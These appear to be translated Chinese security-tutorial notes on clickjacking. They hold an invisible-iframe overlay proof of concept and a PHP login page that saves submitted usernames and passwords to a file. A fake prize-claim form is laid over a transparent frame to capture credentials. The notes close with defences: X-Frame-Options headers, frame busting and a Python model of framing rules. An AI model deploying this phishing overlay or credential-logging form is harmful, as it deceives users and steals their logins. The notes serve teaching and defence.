Attack method
Use: an advanced form of phishing
iframe spoofing source code
Forgery ①
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>点劫持POC</title>
<style>
iframe { width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; -moz-opacity: 0; opacity: 0; filter: alpha(opacity=0); }
button { position: absolute; top: 250px; left: 770px; z-index: 1; width: 80px; height:20px; }
</style>
</head>
<body>
<button>脱掉衣服</button>
<img src="https://recomm.cnblogs.com/images/logo.png">
<iframe src="https://www.baidu.com/" scrolling="no"></iframe><!-- embed the hijacked page in an iframe -->
</body>
</html>
Forgery method ②
1. Build login.php
<?php
// Simple handling: the header must be sent before any HTML output
header('Content-type:text/html; charset=utf-8');
// Handle the submitted login information
if (isset($_POST['login'])) {
    // Receive the user's login details
    $username = trim($_POST['username']);
    $password = trim($_POST['password']);
    // Check the submitted login information
    if (($username != '') || ($password != '')) {
        $myfile = fopen("newfile.txt", "w");
        $txt = $username . " " . $password;
        fwrite($myfile, $txt);
        fclose($myfile);
    }
}
?>
<html>
<head></head>
<body>
<form action="login.php" method="post">
<fieldset>
<legend>用户登录</legend>
<ul>
<li> <label>用户名:</label> <input type="text" name="username" /> </li>
<li> <label>密 码:</label> <input type="password" name="password" /> </li>
<li> <label> </label> <input type="submit" name="login" value="登录" /> </li>
</ul>
</fieldset>
</form>
</body>
</html>
2. Build the hijacking iframe (change opacity to adjust whether it covers the page)
<html>
<head>
<style>iframe{ width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; opacity: 0; }</style>
</head>
<body>
<form action="/" method="post">
<fieldset>
<legend>中奖礼品领取,请先输入账号密码确认身份</legend>
<ul>
<li> <label>用户名:</label> <input type="text" name="username" /> </li>
<li> <label>密 码:</label> <input type="password" name="password" /> </li>
<li> <label> </label> <input type="submit" name="login" value="确认身份" /> </li>
</ul>
</fieldset>
</form>
<iframe src="http://127.0.0.1/login.php"></iframe>
</body>
</html>
Defence methods
① Server side: send the X-Frame-Options response header with one of these values
DENY: the browser refuses to display the page inside any frame
SAMEORIGIN: the page may only be framed by pages from the same origin
ALLOW-FROM origin: the page may only be framed by the specified origin
# Set in PHP
header("X-FRAME-OPTIONS:DENY");
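As an added example (not part of the original notes), a small Python model of how a browser decides whether a page may be framed, given the X-Frame-Options values above and the newer CSP frame-ancestors directive that takes precedence over them; the origins and header sets it is fed are constructed, and CSP wildcard sources are not modelled.

```python
from typing import Mapping, Optional
from urllib.parse import urlsplit


def _origin(url: str) -> str:
    """Reduce a URL to its origin (scheme://host[:port]), lower-cased."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _header(headers: Mapping[str, str], name: str) -> Optional[str]:
    """Case-insensitive lookup, since HTTP header names are case-insensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def framing_allowed(headers: Mapping[str, str], page_url: str, framer_url: str) -> bool:
    """Would a browser honouring these response headers render page_url inside a
    frame hosted at framer_url? Simplified model: exact origin matching only,
    CSP wildcard sources are not handled."""
    page, framer = _origin(page_url), _origin(framer_url)
    csp = _header(headers, "Content-Security-Policy")
    if csp:
        for directive in csp.split(";"):
            parts = directive.strip().split()
            if parts and parts[0].lower() == "frame-ancestors":
                # When frame-ancestors is present it takes precedence over X-Frame-Options
                sources = [s.lower() for s in parts[1:]]
                if "'none'" in sources:
                    return False
                if "'self'" in sources and framer == page:
                    return True
                return framer in sources
    xfo = _header(headers, "X-Frame-Options")
    if xfo is None:
        return True  # no header at all: any site may frame the page (the PoC case)
    value = xfo.strip().lower()
    if value == "deny":
        return False
    if value == "sameorigin":
        return framer == page
    if value.startswith("allow-from"):
        # Obsolete directive, modelled as specified; current browsers ignore it
        parts = value.split(None, 1)
        return len(parts) == 2 and framer == _origin(parts[1])
    return True  # unrecognised value: treated as if the header were absent
```

A response with no header at all is the state the PoC above relies on; DENY or a CSP frame-ancestors 'none' closes it regardless of the framer's origin.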
② Client side
Implemented with a script (frame busting)